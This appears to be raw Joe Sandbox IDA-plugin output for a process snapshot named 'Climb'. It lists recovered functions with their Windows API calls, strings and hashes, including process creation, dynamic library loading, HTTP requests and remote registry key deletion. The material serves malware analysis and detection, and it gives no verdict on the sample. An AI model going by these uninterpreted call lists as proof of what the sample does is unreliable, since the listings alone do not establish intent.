Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(\$(\
API String ID: 221274066-360904246
Opcode ID: 27f2bac42375fa5997ecab80c94d4ea0327df6e5f6a469455e52f27f3611e8d0
Instruction ID: 910a5101e902ab5e03a1aa739736fc27af1753339441319dead2861ddb1c9de2
Opcode Fuzzy Hash: 27f2bac42375fa5997ecab80c94d4ea0327df6e5f6a469455e52f27f3611e8d0
Instruction Fuzzy Hash: 02617B71108305AFC701EF51CC85DABBBE9FF99754F40091EBA91A21A0DB709A49CB62

Function 00510436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00510436

Part of subcall function 0051045D: InitializeCriticalSectionAndSpinCount.KERNEL32(005C170C,00000FA0,316A37B2,?,?,?,?,00532733,000000FF), ref: 0051048C
Part of subcall function 0051045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00532733,000000FF), ref: 00510497
Part of subcall function 0051045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00532733,000000FF), ref: 005104A8
Part of subcall function 0051045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005104BE
Part of subcall function 0051045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005104CC
Part of subcall function 0051045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005104DA
Part of subcall function 0051045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00510505
Part of subcall function 0051045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00510510

___scrt_fastfail.LIBCMT ref: 00510457

Part of subcall function 00510413: __onexit.LIBCMT ref: 00510419

Strings

kernel32.dll, xrefs: 005104A3
WakeAllConditionVariable, xrefs: 005104D2
SleepConditionVariableCS, xrefs: 005104C4
InitializeConditionVariable, xrefs: 005104B8
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00510492

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: cf7e269dbb29e5398962beb176606381a09576d5c976b2f16fc66e7dc6529ac7
Instruction ID: 8f6e32ec6ab5ec5b56a4b59b0116ec6faa1c344ba8cfa8139b7011d9ee70fa34
Opcode Fuzzy Hash: cf7e269dbb29e5398962beb176606381a09576d5c976b2f16fc66e7dc6529ac7
Instruction Fuzzy Hash: 7721F832640B056FEB102BA4AC49F993FE5FF55B61F002515F901A62C0DBF49CC49A64

Function 00564F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0058DCD0), ref: 00564F6C
_wcslen.LIBCMT ref: 00564F80
_wcslen.LIBCMT ref: 00564FDE
_wcslen.LIBCMT ref: 00565039
_wcslen.LIBCMT ref: 00565084
_wcslen.LIBCMT ref: 005650EC

Part of subcall function 0050FD52: _wcslen.LIBCMT ref: 0050FD5D

GetDriveTypeW.KERNEL32(?,005B7C10,00000061), ref: 00565188

Strings

fixed, xrefs: 0056507A, 0056507F
network, xrefs: 005650E2, 005650E7
ramdisk, xrefs: 00565136
unknown, xrefs: 0056514D
all, xrefs: 00564F76, 00564F7B
removable, xrefs: 0056502F, 00565034
cdrom, xrefs: 00564FD4, 00564FD9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 741bea1666ede7d1a321c6a843ee308d1b86d485091d786b93c397bce3c8a288
Instruction ID: ff83b9e8ac5b36571caa0c6615660358e92b6cb735d96a65cc4b6c3bb4fa440c
Opcode Fuzzy Hash: 741bea1666ede7d1a321c6a843ee308d1b86d485091d786b93c397bce3c8a288
Instruction Fuzzy Hash: D8B1FE316087029FC710EF29C894A7ABBE5BFA5724F50491DF596C7291EB30DC84CBA2

Function 0057BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0057BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC34
_wcslen.LIBCMT ref: 0057BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0057BC96
_wcslen.LIBCMT ref: 0057BD92

Part of subcall function 00560F4E: GetStdHandle.KERNEL32(000000F6), ref: 00560F6D

_wcslen.LIBCMT ref: 0057BDAB
_wcslen.LIBCMT ref: 0057BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0057BE16
GetLastError.KERNEL32(00000000), ref: 0057BE67
CloseHandle.KERNEL32(?), ref: 0057BE99
CloseHandle.KERNEL32(00000000), ref: 0057BEAA
CloseHandle.KERNEL32(00000000), ref: 0057BEBC
CloseHandle.KERNEL32(00000000), ref: 0057BECE
CloseHandle.KERNEL32(?), ref: 0057BF43

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 4568511c6c3a123c6b42dc86dfef9673b2e56b1241d98d2731a276571f1e3acb
Instruction ID: d743253f52af72e3e8446e49deeab8c3ffbae238c6007b08dcc67810e597c2dd
Opcode Fuzzy Hash: 4568511c6c3a123c6b42dc86dfef9673b2e56b1241d98d2731a276571f1e3acb
Instruction Fuzzy Hash: 37F1F0316043019FDB14EF24D895B6ABFE5BF84314F14895EF9898B2A2CB70EC44DB92

Function 00574A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0058DCD0), ref: 00574B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00574B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0058DCD0), ref: 00574B4F
FreeLibrary.KERNEL32(00000000,?,0058DCD0), ref: 00574B9B
StringFromGUID2.OLE32(?,?,00000028,?,0058DCD0), ref: 00574C05
SysFreeString.OLEAUT32(00000009), ref: 00574CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00574D25
SysFreeString.OLEAUT32(?), ref: 00574D4F

Strings

kernel32.dll, xrefs: 00574B13
GetModuleHandleExW, xrefs: 00574B24

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 55ee267ee13dfd2ffa6efce533c1d3aa27d45f9ad4a887ae7335026381801e76
Instruction ID: 9d7fcb02d48c7bd066c0310f59b183562bad797407afe9a409e38479aba24927
Opcode Fuzzy Hash: 55ee267ee13dfd2ffa6efce533c1d3aa27d45f9ad4a887ae7335026381801e76
Instruction Fuzzy Hash: 06121971A00119AFDB14DF94D888EAEBBB9FF45314F24C098E909AB251D731ED46DFA0

Function 004F381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(005C29C0), ref: 00533F72
GetMenuItemCount.USER32(005C29C0), ref: 00534022
GetCursorPos.USER32(?), ref: 00534066
SetForegroundWindow.USER32(00000000), ref: 0053406F
TrackPopupMenuEx.USER32(005C29C0,00000000,?,00000000,00000000,00000000), ref: 00534082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0053408E

Strings

0, xrefs: 004F382D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 1c1ebb486acdb5810d5b87be92f8891513154dde1d5931fc0baa7b8ef27ca07c
Instruction ID: 3ddc238faaccd2423836d6a9f906e1bdeaa031e9afdad76bb46d394cf6dbeef9
Opcode Fuzzy Hash: 1c1ebb486acdb5810d5b87be92f8891513154dde1d5931fc0baa7b8ef27ca07c
Instruction Fuzzy Hash: E971E730A44209BFEB219F69DC49FAABFB9FF04364F100216F614AA1E0C779AD14DB55

Function 00587711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00587823

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00587897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005878B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005878CC
DestroyWindow.USER32(?), ref: 005878ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004F0000,00000000), ref: 0058791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00587935
GetDesktopWindow.USER32 ref: 0058794E
GetWindowRect.USER32(00000000), ref: 00587955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0058796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00587985

Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242

Strings

0, xrefs: 005877D0
tooltips_class32, xrefs: 00587890, 00587915

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 5b88e698816a2495ff620561d3527325cfab07e176517fbc4740695c033f3112
Instruction ID: 8518998f4413a873f7e3b90f4d1c25aa1eb204727c190f8afdb5872dbba37a3c
Opcode Fuzzy Hash: 5b88e698816a2495ff620561d3527325cfab07e176517fbc4740695c033f3112
Instruction Fuzzy Hash: 1F716570108248AFD721AF18CC48F7ABBE9FB99304F14041EF985A72A1C770E94ADB25

Function 004F146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 004F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004F1488,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 004F1865

DestroyWindow.USER32(?), ref: 004F1521
KillTimer.USER32(00000000,?,?,?,?,004F145A,00000000,?), ref: 004F15BB
DestroyAcceleratorTable.USER32(00000000), ref: 005329B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 005329E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 005329F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004F145A,00000000), ref: 00532A15
DeleteObject.GDI32(00000000), ref: 00532A27

Strings

<)\, xrefs: 004F15E0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)\
API String ID: 641708696-4104865746
Opcode ID: e333811c311bbaa1b67d0c2e0e12ed963b3664a0059d260a2bdf0eb66d39832d
Instruction ID: d91bb2f4083375a00a97039d2312d1e69cf50751d1e9f24e5058105a6664199c
Opcode Fuzzy Hash: e333811c311bbaa1b67d0c2e0e12ed963b3664a0059d260a2bdf0eb66d39832d
Instruction Fuzzy Hash: AD619B31501B19EFCB399F14D948B3A7BF1FB90326F10901EE542976B0C778A885EB59

Function 0056CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0056CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0056CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0056CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0056CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0056CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0056CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0056CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0056CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0056D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0056D035
InternetCloseHandle.WININET(00000000), ref: 0056D040

Strings

, xrefs: 0056CFBA

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 7c3ed20c90312e875b24590bd957d9d8eba96499dd937361d02e50b40ffa3095
Instruction ID: 9696c339c17db74d9644ca786be7f12f2aff7064f39dc7363134979d370f38bf
Opcode Fuzzy Hash: 7c3ed20c90312e875b24590bd957d9d8eba96499dd937361d02e50b40ffa3095
Instruction Fuzzy Hash: CF513DB1600609BFDB219FA0C888ABA7FFCFB58754F004919F94697250E735D949ABB0

Function 00588FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,005866D6,?,?), ref: 00588FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00588FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589009
CloseHandle.KERNEL32(00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589016
GlobalLock.KERNEL32(00000000), ref: 00589024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589033
GlobalUnlock.KERNEL32(00000000), ref: 0058903C
CloseHandle.KERNEL32(00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00590C04,?), ref: 0058906D
GlobalFree.KERNEL32(00000000), ref: 0058907D
GetObjectW.GDI32(00000000,00000018,?), ref: 0058909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 005890CD
DeleteObject.GDI32(00000000), ref: 005890F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0058910B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 3090d6e098ccda32783b5f2ce552b3b0b8b48418ed087ddd8b7c073788332084
Instruction ID: 1dd137a47d760c352d3c607f0510516bb60d94b5a74f6e1ee5fc1d44efe0e3b6
Opcode Fuzzy Hash: 3090d6e098ccda32783b5f2ce552b3b0b8b48418ed087ddd8b7c073788332084
Instruction Fuzzy Hash: 55410475600208EFDB11AF65DC88EAABBB8FB99711F144058FD06E72A0D7719945EB20

Function 0057C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0057C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 0057C26A
RegCloseKey.ADVAPI32(?), ref: 0057C2DE
RegCloseKey.ADVAPI32(?), ref: 0057C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0057C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0057C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 0057C382
FreeLibrary.KERNEL32(00000000), ref: 0057C3E3
RegCloseKey.ADVAPI32(00000000), ref: 0057C3F4

Strings

advapi32.dll, xrefs: 0057C34D
RegDeleteKeyExW, xrefs: 0057C35E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: bf7f55e341f33fd62c52b8866c93bf1c40a46e7eb2c32de9af2c1a32eceffda8
Instruction ID: 53bcae131e9e1b2bbd994641382aa926d8efd280e121559de595ff7207ae3a63
Opcode Fuzzy Hash: bf7f55e341f33fd62c52b8866c93bf1c40a46e7eb2c32de9af2c1a32eceffda8
Instruction Fuzzy Hash: B2C17B34204201AFD710DF15D494F2ABFE1BF85318F54C89DE99A8B2A2CB35ED46DB92

Function 0058A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

GetSystemMetrics.USER32(0000000F), ref: 0058A990
GetSystemMetrics.USER32(00000011), ref: 0058A9A7
GetSystemMetrics.USER32(00000004), ref: 0058A9B3
GetSystemMetrics.USER32(0000000F), ref: 0058A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0058AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0058AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0058AC54
ShowWindow.USER32(00000003,00000000), ref: 0058AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 0058AC95
DefDlgProcW.USER32(?,00000005,?), ref: 0058ACBB

Strings

@, xrefs: 0058ABD0
(\, xrefs: 0058A95B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(\
API String ID: 3962739598-1489583571
Opcode ID: 079c994bec92fa6581bfe40ca8cf126c64eb743fe1c97c2ad5b330ca5f88fa08
Instruction ID: e246d0ffbccadc33a250891b3d9c18350fbcf79ec6ef64e304657bdb97d136dd
Opcode Fuzzy Hash: 079c994bec92fa6581bfe40ca8cf126c64eb743fe1c97c2ad5b330ca5f88fa08
Instruction Fuzzy Hash: 49B18930600219DFEF14DF68C984BBE7BF2FF44705F18806AED45AA295D770A980CB61

Function 0058976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005897B6
GetFocus.USER32 ref: 005897C6
GetDlgCtrlID.USER32(00000000), ref: 005897D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00589879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0058992B
GetMenuItemCount.USER32(?), ref: 00589948
GetMenuItemID.USER32(?,00000000), ref: 00589958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0058998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005899CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005899FD

Strings

(\, xrefs: 00589779
0, xrefs: 005898FB

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$(\
API String ID: 1026556194-3030511096
Opcode ID: 8ca6e88015a21a7d920b11acd1c7dd74eabe514c3e0a9eb0de6cde1315ae0471
Instruction ID: 712c7dec7bf9434930c17735ab3090ea40090bca5b2ae6bd0b9a7c5bb5b0fea0
Opcode Fuzzy Hash: 8ca6e88015a21a7d920b11acd1c7dd74eabe514c3e0a9eb0de6cde1315ae0471
